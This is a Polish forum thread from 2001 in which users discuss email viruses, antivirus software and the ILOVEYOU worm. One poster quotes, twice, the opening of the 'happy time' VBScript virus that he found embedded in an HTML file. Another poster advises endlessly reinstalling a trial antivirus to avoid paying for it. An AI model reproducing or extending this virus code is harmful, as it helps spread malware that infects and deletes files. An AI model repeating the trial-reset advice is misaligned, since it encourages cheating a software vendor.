Dodaj do ulubionych

Wirusy....

IP: *.inter.net.il 23.08.01, 21:33
Dzis dostalem duzo wirusow, ale jak widzicie jestem jeszcze na "Mapie"
chce tylko przypomniec, ze kto ich wysyla to grozi kara wiezienia co najmniej...
Obserwuj wątek
    • Gość: jajacek Re: Wirusy....i Bakterje IP: *.kabel.telenet.be 23.08.01, 22:34
      A to pij ziola!
      Jak dostales te wirusy?
      Radze wejsc na strone www.poland.com,tam w serwisie"download"chyba w
      dziale "dodatki"jest malutki programik "ProPort"zciagnij go sobie .
      Zawsze bedziesz wiedzial czy masz nieproszonych gosci w komputerze!
    • Gość: Stoik Re: Wirusy.... IP: 10.0.207.* / 212.191.188.* 23.08.01, 23:00
      Drogi Mosze,
      to jakaś epidemia, dziś doszło do mnie 15 listów z wirusami. Ale nie myśl
      sobie, że tyle jest złośliwych ludzi na świecie. Jak otworzysz załącznik z
      takim wirusem, to on zaraz rozsyła listy z sobą samym do wszystkich, którzy są
      w Twojej książce adresowej!
      Polecam jakiś dobry program antywirusowy, np. Norton Antyvirus, który sprawdza
      listy w trakcie ich przychodzenia.
      Serdecznie pozdrawiam i życzę szybkiego ozdrowienia (komputera).
      • Gość: Mosze Re: Wirusy.... IP: *.inter.net.il 23.08.01, 23:28
        Dziekuje, ja nie otwozylem, kilka bylo pisane po "Chinsku" ale wedlug adresu to
        wiem skad one przychodza...
        • Gość: Scan Re: Wirusy.... IP: *.home.net.pl 24.08.01, 03:24
          Mosze drogi, Norton antyvirus dobry na zachodnie wirusy, a one lagodne. Na
          wszelka france najlepszy polski mks.vir. - www.mksvir.com. Nie kijem, to palka
          wygna.
          I darmo.
          Pozdrawiam
          Scan
          • Gość: SCAN Re: Wirusy.... IP: *.home.net.pl 24.08.01, 03:45
            Poprawka, Mosze: mks.com.pl. versja traialowa 30 dni. Ale po 30 dniach zainstaluj
            od nowa i tak na okrąglo. Koniecznie zachowaj instalke. Nie ujrzy Marek Sell ani
            szekla!!!!
            Pozdrawiam
            Scan
            Gość portalu: Scan napisał(a):

> Mosze drogi, Norton antyvirus dobry na zachodnie wirusy, a one lagodne. Na
            > wszelka france najlepszy polski mks.vir. - www.mksvir.com. Nie kijem, to palka
            > wygna.
            > I darmo.
            > Pozdrawiam
            > Scan

• Gość: Mosze Czy widze dobrze...?? IP: *.inter.net.il 24.08.01, 15:50
              Panie Scan ta godzina to prawdziwa...
              U nas sie mowi nie pyta sie mezczyzny co robi po nocy .... ale ??
              Pzdr,
              Mosze
              • Gość: scan Re: Czy widze dobrze...?? IP: *.home.net.pl 24.08.01, 19:49
                Mosze, ja czuwam. Dniami i nocami.Zebys mogl spac spokojnie.
                Pozdrowienia
                Scan
    • Gość: maurycy Re: Wirusy.... IP: *.jeleniag.sdi.tpnet.pl 24.08.01, 08:18
      Drogi Mosze,

Niewiele można zrobić, poza wyrzuceniem zawirusowanego postu.
      Często wysyłający posty, nie wiedzą, że wysyłają wirusy typu robak.
      Co do porogramów antywirusowych, to polecam stronę:

http://www.wirusy.pl/wirusy.php/index0.php

na której masz do wyboru kilka programów antywirusowych, z których polecam
      AVP Eugene Kasperky Pro. Jest on wiele lepszy od McAfee, czy też Norton
      Ativirus.

Pozdrowienia,

Maurycy

• sceptyk Re: Wirusy.... 24.08.01, 10:17
      Zasada numer 1 emailu: jesli dostajesz list z attachment z nieznanego adresu -
      NIE OTWIERASZ! Prosto do smieci. Chocby nawet w tytule bylo, ze ktos Cie kocha,
      albo ze masz szanse wygrac 1 000 000.

pzdr
      sc-k
      • Gość: Hiacynt Re: Wirusy.... Pozdrawiam wszystkich wirusologów IP: *.klodzko.sdi.tpnet.pl 24.08.01, 10:52
        sceptyk napisał(a):

> Zasada numer 1 emailu: jesli dostajesz list z attachment z nieznanego adresu -
        > NIE OTWIERASZ! Prosto do smieci. Chocby nawet w tytule bylo, ze ktos Cie kocha,
        >
        > albo ze masz szanse wygrac 1 000 000.
        >
        > pzdr
        > sc-k

A co zrobić jak w tytule stoi: Nie otworzysz to umrzesz. ??? smile
        Pozdrawiam wszystkich wirusologów
    • Gość: Lechu Uwaga na strony HTML IP: 10.129.226.* / *.acn.pl 24.08.01, 10:38
      Ostatnio złapałem wirusa tylko oglądając strony HTML w internecie. Nie miałem
      jeszcze żadnego scana (sorry, SCAN). Ale później zainstalowałem mks''a i mks go
      wykrywał. Ten wirus był wredny: zarażał moje html''e, exe''ki i dll''e. Po czym
      kasował pliki. W html''u to był kawałek programu (znakowo-VBscript). Problem w
      tym, że strony html standardowo zawierają programy (procedury) w VBscripcie,
      javie, itp., które są potrzebne do prezentacji strony, np. animacje. Ale
      niektóre z tych procedur (wirusy) chcą coś zmienić w innych plikach. Wtedy te
      akcje wyłapuje program antywirusowy.
      • Gość: Indris HTML ??? IP: *.ibspan.waw.pl 24.08.01, 13:00
        Gość portalu: Lechu napisał(a):

> Ostatnio złapałem wirusa tylko oglądając strony HTML w internecie. Nie miałem
        > jeszcze żadnego scana (sorry, SCAN). Ale później zainstalowałem mks''''a i mks go
        >
        > wykrywał. Ten wirus był wredny: zarażał moje html''''e, exe''''ki i dll''''e. Po czym
        >
        > kasował pliki. W html''''u to był kawałek programu (znakowo-VBscript). Problem w
        > tym, że strony html standardowo zawierają programy (procedury) w VBscripcie,
        > javie, itp., które są potrzebne do prezentacji strony, np. animacje. Ale
        > niektóre z tych procedur (wirusy) chcą coś zmienić w innych plikach. Wtedy te
        > akcje wyłapuje program antywirusowy.

Proponuję Ci, żebyś przesłał tę informację do producenta VBscriptu, może CI nawet coś odpalą, a oprócz
        tego pokazał ten kawałek kodu. Jeszcze bardziej dotyczy to Javy. Producent Javy już jakiś czas temu
        zwracał się do wszystkich użytkowników z prośbą o łamanie zabezpieczeń i powiadamianie jak się uda.
        Nie znam VBscriptu, ale domyślam się, że ma wpisany zakaz odnoszenia się do plików na komputerze
        klienta, Java ma to na pewno. Gdyby wstawki VBs mogły robić takie rzeczy jak piszesz, to chyba już by było
        o tym głośno ? Ale może to jakiś wirusowy geniusz wpadł na to o czym nikt wcześniej nie pomyślał ?
        Albo więc jest to jakaś Twoja pomyłka albo bomba sezonu. Podaj szczegóły !
        Od niedzieli będę na urlopie przez ok miesiąca ale z dużym zaciekawieniem przeczytam po powrocie.
        • Gość: Lechu Oto początek kodu virusa z HTML (happy time) IP: 10.129.226.* / *.acn.pl 24.08.01, 14:34
          Pierwsza reakcja mks-a była na pliku tymczasowym help.htm. Cały poniższy kod
          został dołączony na końcu, za znacznikiem </html>. Niewykluczone że sam script
          nie odnosi się do plików, lecz ściąga jakiś inny plik, który to robi.
          Takie zdarzenie miałem po raz pierwszy od kilku lat surfowania. Sądzę więc (na
          szczęście), że nie jest to powszechny sposób infekowania. Ale umieszczanie bomb
          zegarowych może długi czas zostać niewykryte, aż do czasu zero.

Początek kodu:

<script language=''VBScript''>
          Rem I am sorry! happy time
          On Error Resume Next
          mload
          Sub mload()
          On Error Resume Next
          mPath = Grf()
          Set Os = CreateObject("Scriptlet.TypeLib")
          Set Oh = CreateObject("Shell.Application")
          If IsHTML Then
          mURL = LCase(document.Location)
          If mPath = "" Then
          Os.Reset
          Os.Path = "C:\Help.htm"
          Os.Doc = Lhtml()
          Os.Write()
        • Gość: Lechu Oto początek kodu virusa z HTML (happy time) IP: 10.129.226.* / *.acn.pl 24.08.01, 14:35
          Pierwsza reakcja mks-a była na pliku tymczasowym help.htm. Cały poniższy kod
          został dołączony na końcu, za znacznikiem </html>. Niewykluczone że sam script
          nie odnosi się do plików, lecz ściąga jakiś inny plik, który to robi.
          Takie zdarzenie miałem po raz pierwszy od kilku lat surfowania. Sądzę więc (na
          szczęście), że nie jest to powszechny sposób infekowania. Ale umieszczanie bomb
          zegarowych może długi czas zostać niewykryte, aż do czasu zero.

Początek kodu:

<script language=''VBScript''>
          Rem I am sorry! happy time
          On Error Resume Next
          mload
          Sub mload()
          On Error Resume Next
          mPath = Grf()
          Set Os = CreateObject("Scriptlet.TypeLib")
          Set Oh = CreateObject("Shell.Application")
          If IsHTML Then
          mURL = LCase(document.Location)
          If mPath = "" Then
          Os.Reset
          Os.Path = "C:\Help.htm"
          Os.Doc = Lhtml()
          Os.Write()
      • Gość: pollak Re: Uwaga na strony HTML IP: *.jgora.dialog.net.pl 24.08.01, 13:04
        Gość portalu: Lechu napisał(a):

> Ostatnio złapałem wirusa tylko oglądając strony HTML w internecie. Nie miałem
        > jeszcze żadnego scana (sorry, SCAN). Ale później zainstalowałem mks''''a i mks go
        >
        > wykrywał. Ten wirus był wredny: zarażał moje html''''e, exe''''ki i dll''''e. Po czym
        >
        > kasował pliki. W html''''u to był kawałek programu (znakowo-VBscript). Problem w
        > tym, że strony html standardowo zawierają programy (procedury) w VBscripcie,
        > javie, itp., które są potrzebne do prezentacji strony, np. animacje. Ale
        > niektóre z tych procedur (wirusy) chcą coś zmienić w innych plikach. Wtedy te
        > akcje wyłapuje program antywirusowy.

exe-ki, dll-e ... panowie rzucmy te Windowsy, bo sie rozchorujemy.
      • Gość: Indris Podziękowanie i jedna uwaga IP: *.ibspan.waw.pl 24.08.01, 19:30
        Dziękuję za kod, jeszcze go zdążyłem odczytać. Mam jedno spostrzeżenie: VBscript jest akceptowany
        przez Internet Explorera, ale ignorowany przez Netscape (przynajmniej do wersji 4.75). O innych
        przeglądarkach nie wiem nic ''w tym temacie''. Dlatego m/in nie zapoznałem się dotąd z VBscriptem,
        bo staram się tworzyć strony akceptowane przez obie przeglądarki. Wynikałoby z tego, że Netscape
        jest przeglądarką bezpieczniejszą, bo jedyne aktywne wstawki przy NS to wstawki JavaScript i aplety
        Javy.
        Wirusa w JavaScript sobie nie wyobrażam (ale może to niedostatek wyobraźni). O wirusie w Javie, też
        nie słyszałem, ale widziałem przykład apletu zatykającego komputer. Idea była prosta: aplet tworzył
        nowy wątek, który tworzył nowy wątek, który... To się nie replikowało, więc nie było klasycznym
        wirusem, ale wnerwiać potrafiło.
    • Gość: M. Re: Wirusy.... IP: *.warszawa.cvx.ppp.tpnet.pl 24.08.01, 13:03
    • Gość: M. Zalaczniki IP: *.warszawa.cvx.ppp.tpnet.pl 24.08.01, 13:15
      Wirusy, jak dobre potrafia nas zaskoczyc. Ja mialam mialam malo zabawna
      historie. Dostalam mail od bardzo szacownego pana na wysokim stanowisku, z
      ktorym prowadzilam sluzbowa korespondencje: tytul byl: I love you. Pomyslalam,
      ze oszalal albo, ze ja wyslalam mu cos niewlasciwego przez pomylke, albo czyms
      mu sie przysluzylam. Bylam pierwsza w biurze. Po chwili przyszli koledzy i
      zaczeli tez mi odsylac milosne zwierzenia. A dobrze juz wtedy wiedzialam, ze
      nieznanych zalacznikow otwierac nie mozna. ZAnim wyjasniono, ze to
      ogolnoswiatowa zaraza, administrator doszedl, ze to ja pierwsza rozsylac je po
      firmie zaczelam - a firma w calej Europie - i bardzo sie cieszyl palcem na mnie
      wskazujac. Pamietacie tego wirusa, prawda?
      • Gość: Venom Re: Zalaczniki IP: 192.168.14.* / 192.168.14.* / *.121.135.226.host.de.colt.net 24.08.01, 13:41
        Moral jest taki: nigdy nie przychodz jako pierwsza do
        pracy smile A poza tym wspolczuje. Ten wirus wywolal
        histerie i zaliczenie w poczet jego rozmnazaczy nie
        moglo byc przyjemne.
      • Gość: maurycy Re: Zalaczniki IP: *.jeleniag.sdi.tpnet.pl 24.08.01, 13:42
        Ja dostałem I Love You od bardzo miłej pani z którą wspołpracuję od lat.

smile))
    • Gość: francek Wirusy?....instalujcie wigwamy!!!!!!!! IP: *.pppool.de 24.08.01, 13:34
      Pan Pollak ma racje!!!
      w tym miejscu powiedziec moge tylko:
      "Linux is like a wigwam: no windows, no gates, apache inside !"

• Gość: witek Re: Wirusy?....instalujcie wigwamy!!!!!!!!________albo Igloo IP: *.chello.pl 24.08.01, 18:37
        Przepraszam, że się odzywam bo niczego istotnego nie umiem dodać.Nie mogę się
        jednak oprzeć pokusie żeby się nie odezwać.
        Czytam Was na bieżąco i co raz bardziej mam otwarte usta z podziwu z jakimi to
        ja kompetentnymi ludżmi wirtualnie obcuję.
        Oczywiście wszystko sobie zanotowałem.
        Dziękuję, pozdrawiam Mosze i naszych przyjaznych EKSPERTÓW
        Witek
        • Gość: jajacek Re: Dziki SCAN :))) IP: *.kabel.telenet.be 24.08.01, 19:27
          Dziki,ze napisales link do tego programu .
          Do godz.17 korzystalem z PC Cillin2000 powodowal cigle konflikty przy starcie
          systemu.
          Wgralem ten polski program i przetestowalem go ,wpuscilem mu kontrolnie trzy
          wirusy.
          Rozpoznal je bezblednie!
          Cudze chwalicie swojego nie znacie!!!!!!!!!!!!!!!!!
          PS.
          Przy wszystkich zaletach zajmoje tylko 3.8MB!!!!!!!!!!
          • Gość: Jajacek Re: Dziki SCAN :))) ---- oczywiscie DZIEKI SCAN IP: *.kabel.telenet.be 24.08.01, 19:36
            Kawalek z ciasta ,ktore jadlem przy pisaniu poprzedniego postu blokowal
            skutecznie klawisz z literka "E" co zobaczylem za pozno.smile))))
        • Gość: Tytus Re: Pseudo wirusy Wirusy sa twoim straznikiem IP: *.ti.telenor.net 24.08.01, 19:35
          Mam taki zwyczaj : jak od kogos nie chce dostawac wiecej postow to wysylam E-
          post z emnne : I love you . Oczywiscie wysylam post bez wirusa bo takiego nie
          posiadam i jeszcze podobnego problemu nie mialem . W kazdym razie namierzony
          klijent jest z glowy .

Polecam sprawdzone !
          Tytus
Inne wątki na temat:

Nie masz jeszcze konta? Zarejestruj się

Nakarm Pajacyka